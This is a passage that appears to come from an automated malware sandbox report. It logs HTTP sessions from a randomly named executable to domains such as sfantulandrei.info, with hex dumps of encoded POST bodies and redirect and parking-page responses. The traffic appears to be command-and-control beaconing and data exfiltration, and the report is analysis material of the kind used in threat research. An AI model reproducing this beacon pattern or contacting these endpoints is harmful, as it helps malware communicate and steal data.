                                                                    Data Raw: 4b 78 5a 3d 48 36 4f 58 4d 2f 6f 33 2b 6c 39 61 68 76 6b 6c 57 44 4b 2f 31 63 75 53 32 64 30 52 39 58 58 6e 32 78 71 7a 59 73 71 4e 57 71 45 31 75 32 71 45 64 4d 37 32 58 62 39 64 78 4a 62 35 41 71 6a 7a 75 7a 2f 46 77 32 73 31 61 35 2b 46 37 48 30 43 71 73 6e 4e 33 59 50 78 2f 74 53 69 6f 36 79 68 6a 54 39 59 54 59 52 6c 2b 6b 4f 79 61 49 2f 41 42 59 74 62 64 72 44 78 76 76 45 6b 39 67 51 62 59 47 7a 53 64 70 67 4c 46 6a 76 63 6c 58 58 57 2f 45 39 56 58 57 75 33 76 4d 56 56 6a 46 63 6b 7a 7a 62 73 41 53 36 48 58 46 58 72 5a 65 42 76 69 33 37 73 4b 39 52 4d 30 70 69 4d 43 6b 68 6d 36 62 4f 31 76 53 6a 47 61 35 4d 56 64 4f 6e 63 66 51 44 7a 2f 6f 57 77 56 57 63 72 64 44 4d 7a 6e 6d 69 32 6f 4e 33 56 67 58 41 49 35 52 50 45 56 53 5a 68 30 78 58 6e 4c 75 51 6a 39 42 6e 69 64 30 71 70 47 59 39 64 37 57 33 51 37 30 61 64 58 2f 44 7a 35 2f 4b 64 2f 4b 6d 6b 6f 31 36 76 6e 4e 7a 4e 4a 70 69 65 2f 6a 76 34 45 2b 4b 4d 75 50 6c 33 45 48 73 57 65 57 34 54 57 38 2b 53 62 63 32 63 4d 39 78 45 44 30 6d 55 71 2b [TRUNCATED]
                                                                    Data Ascii: KxZ=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 [TRUNCATED]
                                                                    Dec 6, 2024 10:06:56.129877090 CET | 368 | IN | HTTP/1.1 301 Moved Permanently
                                                                    Server: openresty
                                                                    Date: Fri, 06 Dec 2024 09:06:55 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 166
                                                                    Connection: close
                                                                    Location: https://www.muasamgiare.click/dc08/
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                    Session ID: 20 | Source IP: 192.168.2.6 | Source Port: 50030 | Destination IP: 13.228.81.39 | Destination Port: 80 | PID: 5000 | Process: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 6, 2024 10:06:57.199027061 CET | 597 | OUT | GET /dc08/?KxZ=K4m3PKR19259jK4EK1P0lrWLqd0y31/RgB+Ra8HyZbA6ylGAas28Oq8W0qL+J5Tllh3R0W9eHcyUnmETvv/z35TM8/OCjKyI0RRWf5xhtUunUrv8dIQZV5rCv+EV3icANGbLYtw=&T2M=Y0Z0G HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.muasamgiare.click
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Dec 6, 2024 10:06:58.786322117 CET | 519 | IN | HTTP/1.1 301 Moved Permanently
                                                                    Server: openresty
                                                                    Date: Fri, 06 Dec 2024 09:06:58 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 166
                                                                    Connection: close
                                                                    Location: https://www.muasamgiare.click/dc08/?KxZ=K4m3PKR19259jK4EK1P0lrWLqd0y31/RgB+Ra8HyZbA6ylGAas28Oq8W0qL+J5Tllh3R0W9eHcyUnmETvv/z35TM8/OCjKyI0RRWf5xhtUunUrv8dIQZV5rCv+EV3icANGbLYtw=&T2M=Y0Z0G
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.6 | 50032 | 199.59.243.227 | 80 | 5000 | C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 10:07:04.688956022 CET | 872 | OUT | POST /wvsm/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.sfantulandrei.info
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 208
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.sfantulandrei.info
                                                                    Referer: http://www.sfantulandrei.info/wvsm/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Data Raw: 4b 78 5a 3d 4b 33 42 2f 57 6f 49 76 63 72 70 6c 4c 52 68 57 74 50 71 4b 46 37 64 4c 4b 39 4c 4f 6f 41 75 36 47 64 59 74 70 37 31 68 4b 2b 70 70 68 56 78 44 75 35 67 4d 46 6d 73 41 69 44 63 43 41 7a 50 72 4f 72 79 74 31 6e 46 76 58 38 76 32 35 38 37 51 70 67 2b 65 72 67 69 2b 6e 43 31 68 33 46 75 31 4c 77 61 48 77 39 59 45 59 64 72 6e 52 6b 6c 78 64 6c 48 6d 50 58 6c 77 71 5a 76 53 62 7a 74 68 47 33 49 59 34 73 50 69 2f 53 49 79 6f 77 75 2b 74 75 6c 75 6b 7a 5a 51 44 6c 52 2f 76 59 74 76 56 68 73 76 6c 59 48 57 70 73 78 32 77 4f 41 2f 4a 54 77 56 45 65 64 42 31 41 50 44 30 72 6c 47 33 36 54 5a 37 6d 4a 72 47 48 67 42
                                                                    Data Ascii: KxZ=K3B/WoIvcrplLRhWtPqKF7dLK9LOoAu6GdYtp71hK+pphVxDu5gMFmsAiDcCAzPrOryt1nFvX8v2587Qpg+ergi+nC1h3Fu1LwaHw9YEYdrnRklxdlHmPXlwqZvSbzthG3IY4sPi/SIyowu+tulukzZQDlR/vYtvVhsvlYHWpsx2wOA/JTwVEedB1APD0rlG36TZ7mJrGHgB
Dec 6, 2024 10:07:05.771228075 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                    date: Fri, 06 Dec 2024 09:07:05 GMT
                                                                    content-type: text/html; charset=utf-8
                                                                    content-length: 1138
                                                                    x-request-id: a0443c0e-f3bd-4f7a-8db1-f7467016e7af
                                                                    cache-control: no-store, max-age=0
                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                    vary: sec-ch-prefers-color-scheme
                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fXDadG+GCAk3+mkhM8vPXCBHTcMTKqItZ/Vac5dzjpdoZNY3/LPurA6ULLd4jKzLGlYz/qVfWHP5r26OS50bSA==
                                                                    set-cookie: parking_session=a0443c0e-f3bd-4f7a-8db1-f7467016e7af; expires=Fri, 06 Dec 2024 09:22:05 GMT; path=/
                                                                    connection: close
                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 66 58 44 61 64 47 2b 47 43 41 6b 33 2b 6d 6b 68 4d 38 76 50 58 43 42 48 54 63 4d 54 4b 71 49 74 5a 2f 56 61 63 35 64 7a 6a 70 64 6f 5a 4e 59 33 2f 4c 50 75 72 41 36 55 4c 4c 64 34 6a 4b 7a 4c 47 6c 59 7a 2f 71 56 66 57 48 50 35 72 32 36 4f 53 35 30 62 53 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fXDadG+GCAk3+mkhM8vPXCBHTcMTKqItZ/Vac5dzjpdoZNY3/LPurA6ULLd4jKzLGlYz/qVfWHP5r26OS50bSA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Dec 6, 2024 10:07:05.771253109 CET | 591 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTA0NDNjMGUtZjNiZC00ZjdhLThkYjEtZjc0NjcwMTZlN2FmIiwicGFnZV90aW1lIjoxNzMzNDc2MD


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.6 | 50033 | 199.59.243.227 | 80 | 5000 | C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 10:07:07.344991922 CET | 896 | OUT | POST /wvsm/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.sfantulandrei.info
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 232
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.sfantulandrei.info
                                                                    Referer: http://www.sfantulandrei.info/wvsm/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Data Raw: 4b 78 5a 3d 4b 33 42 2f 57 6f 49 76 63 72 70 6c 52 78 52 57 69 50 57 4b 41 62 64 4d 47 64 4c 4f 39 77 75 6d 47 64 55 74 70 36 41 6b 4b 4d 39 70 68 77 56 44 76 38 4d 4d 4c 47 73 41 32 54 63 48 66 6a 4f 6c 4f 72 2b 6c 31 6b 64 76 58 39 50 32 35 35 48 51 70 7a 57 64 70 77 69 34 75 69 31 5a 30 31 75 31 4c 77 61 48 77 39 4d 39 59 64 54 6e 51 57 78 78 48 41 7a 6c 52 48 6c 2f 38 4a 76 53 66 7a 74 6c 47 33 49 2b 34 75 36 48 2f 51 77 79 6f 78 65 2b 73 37 46 76 75 7a 5a 57 4d 46 51 49 6a 36 45 31 52 68 31 62 68 61 76 79 6f 66 6c 72 38 59 64 6c 56 67 77 32 57 4f 39 44 31 43 58 78 30 4c 6c 73 31 36 72 5a 70 78 46 4d 4a 7a 46 69 58 6a 4d 51 46 4f 37 47 63 34 68 70 6e 76 48 4b 2b 7a 30 4e 70 51 3d 3d
                                                                    Data Ascii: KxZ=K3B/WoIvcrplRxRWiPWKAbdMGdLO9wumGdUtp6AkKM9phwVDv8MMLGsA2TcHfjOlOr+l1kdvX9P255HQpzWdpwi4ui1Z01u1LwaHw9M9YdTnQWxxHAzlRHl/8JvSfztlG3I+4u6H/Qwyoxe+s7FvuzZWMFQIj6E1Rh1bhavyoflr8YdlVgw2WO9D1CXx0Lls16rZpxFMJzFiXjMQFO7Gc4hpnvHK+z0NpQ==
Dec 6, 2024 10:07:08.427506924 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                    date: Fri, 06 Dec 2024 09:07:07 GMT
                                                                    content-type: text/html; charset=utf-8
                                                                    content-length: 1138
                                                                    x-request-id: c8751983-890e-4822-af1c-c9b6b0322368
                                                                    cache-control: no-store, max-age=0
                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                    vary: sec-ch-prefers-color-scheme
                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fXDadG+GCAk3+mkhM8vPXCBHTcMTKqItZ/Vac5dzjpdoZNY3/LPurA6ULLd4jKzLGlYz/qVfWHP5r26OS50bSA==
                                                                    set-cookie: parking_session=c8751983-890e-4822-af1c-c9b6b0322368; expires=Fri, 06 Dec 2024 09:22:08 GMT; path=/
                                                                    connection: close
                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 66 58 44 61 64 47 2b 47 43 41 6b 33 2b 6d 6b 68 4d 38 76 50 58 43 42 48 54 63 4d 54 4b 71 49 74 5a 2f 56 61 63 35 64 7a 6a 70 64 6f 5a 4e 59 33 2f 4c 50 75 72 41 36 55 4c 4c 64 34 6a 4b 7a 4c 47 6c 59 7a 2f 71 56 66 57 48 50 35 72 32 36 4f 53 35 30 62 53 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fXDadG+GCAk3+mkhM8vPXCBHTcMTKqItZ/Vac5dzjpdoZNY3/LPurA6ULLd4jKzLGlYz/qVfWHP5r26OS50bSA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Dec 6, 2024 10:07:08.427552938 CET | 591 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzg3NTE5ODMtODkwZS00ODIyLWFmMWMtYzliNmIwMzIyMzY4IiwicGFnZV90aW1lIjoxNzMzNDc2MD


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.6 | 50034 | 199.59.243.227 | 80 | 5000 | C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 10:07:10.000368118 CET | 1909 | OUT | POST /wvsm/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.sfantulandrei.info
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 1244
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.sfantulandrei.info
                                                                    Referer: http://www.sfantulandrei.info/wvsm/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Data Raw: 4b 78 5a 3d 4b 33 42 2f 57 6f 49 76 63 72 70 6c 52 78 52 57 69 50 57 4b 41 62 64 4d 47 64 4c 4f 39 77 75 6d 47 64 55 74 70 36 41 6b 4b 4e 46 70 67 44 74 44 75 66 55 4d 49 47 73 41 71 6a 63 47 66 6a 4f 6f 4f 72 6d 62 31 6a 56 2f 58 35 2f 32 35 66 7a 51 39 57 71 64 6a 77 69 34 73 69 31 69 33 46 75 6b 4c 77 4b 39 77 39 63 39 59 64 54 6e 51 57 64 78 52 46 48 6c 54 48 6c 77 71 5a 76 4f 62 7a 73 36 47 7a 63 41 34 75 75 39 2f 68 51 79 76 52 4f 2b 75 49 74 76 73 54 5a 55 50 46 51 51 6a 36 5a 72 52 68 59 69 68 65 76 49 6f 64 35 72 2f 4d 34 50 49 77 34 4f 44 38 35 6b 6a 7a 7a 4e 36 4d 35 46 76 63 37 41 69 7a 31 71 4f 43 6b 4a 58 44 5a 49 49 4d 37 47 61 36 74 2f 35 70 2b 6f 7a 48 70 6c 72 31 70 6c 33 34 67 46 30 4f 6c 4e 54 41 2b 32 6a 6d 50 53 4c 56 79 58 56 4b 44 57 63 59 5a 31 77 56 47 6d 6c 47 61 44 51 61 69 72 62 54 36 37 79 44 50 74 69 4a 48 33 61 49 72 62 4d 48 2f 4d 55 46 36 4e 58 64 56 46 69 35 34 6c 69 70 33 73 44 33 71 48 39 65 62 4c 51 48 4b 34 56 54 66 4a 59 62 61 56 55 32 6d 48 72 5a 57 66 62 79 [TRUNCATED]
                                                                    Data Ascii: KxZ=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 [TRUNCATED]
Dec 6, 2024 10:07:11.088685989 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                    date: Fri, 06 Dec 2024 09:07:10 GMT
                                                                    content-type: text/html; charset=utf-8
                                                                    content-length: 1138
                                                                    x-request-id: ba4b4c8d-4319-49b3-99b6-7c3284e57a83
                                                                    cache-control: no-store, max-age=0
                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                    vary: sec-ch-prefers-color-scheme
                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fXDadG+GCAk3+mkhM8vPXCBHTcMTKqItZ/Vac5dzjpdoZNY3/LPurA6ULLd4jKzLGlYz/qVfWHP5r26OS50bSA==
                                                                    set-cookie: parking_session=ba4b4c8d-4319-49b3-99b6-7c3284e57a83; expires=Fri, 06 Dec 2024 09:22:10 GMT; path=/
                                                                    connection: close
                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 66 58 44 61 64 47 2b 47 43 41 6b 33 2b 6d 6b 68 4d 38 76 50 58 43 42 48 54 63 4d 54 4b 71 49 74 5a 2f 56 61 63 35 64 7a 6a 70 64 6f 5a 4e 59 33 2f 4c 50 75 72 41 36 55 4c 4c 64 34 6a 4b 7a 4c 47 6c 59 7a 2f 71 56 66 57 48 50 35 72 32 36 4f 53 35 30 62 53 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fXDadG+GCAk3+mkhM8vPXCBHTcMTKqItZ/Vac5dzjpdoZNY3/LPurA6ULLd4jKzLGlYz/qVfWHP5r26OS50bSA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Dec 6, 2024 10:07:11.088732958 CET | 591 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYmE0YjRjOGQtNDMxOS00OWIzLTk5YjYtN2MzMjg0ZTU3YTgzIiwicGFnZV90aW1lIjoxNzMzNDc2MD


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.6 | 50035 | 199.59.243.227 | 80 | 5000 | C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 10:07:12.651443958 CET | 598 | OUT | GET /wvsm/?T2M=Y0Z0G&KxZ=H1pfVel2drlcYDh6ppeQKLdaO9DOhj6yIL88m4llHuZ84xsjifxTPgBHlBYfPRS4eY+v71s/bZzgmcWb/gq2oBm3vCtx6xeHagKgyNNQL6/tdUVValn9agt9lf/uYkxXHUES57U= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.sfantulandrei.info
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
Dec 6, 2024 10:07:13.738337994 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                    date: Fri, 06 Dec 2024 09:07:13 GMT
                                                                    content-type: text/html; charset=utf-8
                                                                    content-length: 1502
                                                                    x-request-id: 0961176a-5487-4171-8591-ac66359b926d
                                                                    cache-control: no-store, max-age=0
                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                    vary: sec-ch-prefers-color-scheme
                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Pjz+OAKG5+HYjQ3CkzEmidnvmzTa1uSo7Ro0YRgC9eT4etfNNHOHX9a+6ztP6z+/EMaRuq5+S6jB+f9+FkJaOg==
                                                                    set-cookie: parking_session=0961176a-5487-4171-8591-ac66359b926d; expires=Fri, 06 Dec 2024 09:22:13 GMT; path=/
                                                                    connection: close
